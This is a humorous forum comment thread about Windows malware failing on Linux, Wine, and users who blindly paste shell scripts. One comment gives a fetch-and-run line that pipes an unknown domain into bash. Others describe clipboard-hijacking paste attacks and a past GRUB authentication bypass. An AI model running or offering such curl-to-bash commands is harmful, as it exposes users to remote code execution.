Exe in a bottle
Exe in a bottle
Exe in a bottle
until you try to install .exe game file using lutris and wine
This is were WINE comes handy /s
WannaCry: Platinium
Virus running in wine: "WTF is this place. It's familiar, but it's all wrong!"
Why does your admin account look like a scrotum?
Yours doesn’t?
it's where the power is stored
Maybe because scratching an itch there is generally seen as a bad move if you don't know what you're doing.
Insert joke about it taking balls to use it
Insert another joke about it being the root of the access tree/graph in the image
... and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.
Raises hand I might be some people 🥺
There's some people in all of us
curl gu5usgugiv.lol | bash || curl get.k3s.io | bash
Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.
Let me open up my Linux bible and see if its malicious
...so, never put things in the terminal?
In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.
Even if you understand the commands, you need to trust the website because a malicious site can use JavaScript to copy something completely different into your clipboard, with a newline character at the end to automatically execute when pasted. (Is the newline exploit fixed in all shells? It used to fail in zsh but work in many others...)
One can also paste into a text editor to verify before pasting into terminal, but what noob is going to know or bother to?
What do they hope to do in a temporary qube VM?
Wine automatically running:
A friend of mine once downloaded something malicious to his Linux machine and wasn't worried about it. Then some time later, while browsing his files from a Windows machine, saw it and was like, "hey, what's this?" Oops.
He's a tech savvy guy, so I'm guessing the fact he had downloaded it himself really let his guard down.
That's why you don't store your stool samples in the same fridge as your chocolate pudding. Malware goes into the vault.
That's another reason not to dual boot. Ditch Windows.
Modern viruses check the os before deciding which type of file to send your way.
And then it starts running because you set up wine with binfmt_misc, only to crash a few seconds later
Remember that time, when it was possible for about 6 years to hack into any Linux system (without drive encryption) which had GRUB by pressing backspace exactly 28 times? Yeah, good old times.
If the adversary has physical access you are generally pwned either way
That's hyperbole. Such a system can be "hacked" by simply plugging in a usb-stick and booting from that instead, or dozens of other ways.
The only reason to use GRUB authentication I can think of would be in something like a kiosk.
Yeah that is not really an "OMG" vulnerability as I can also get into that machine by booting it with a USB drive, or plugging it's drove into my own machine.
Does anyone here use GRUB authentication? If so why? What's your threat model?
This has given me a horrendous idea involving a Windows batch file and a weird shebang
you're not the first. there absolutely are multiplatform launcher scripts. i have used one for installers a few years ago.
Shebang needs executable rights afaik.
The virgin bin vs the chad .exe
Well if the exe was in a bottle it would be dangerous.
Same with android. There isn't even wine there
Android has an extensive application sandboxing mechanism
Sometimes when I've torrenting from a public wifi I'll get a malicious .scr file - but since I torrent from an Android phone it can't do anything to me.
Wrong location my dear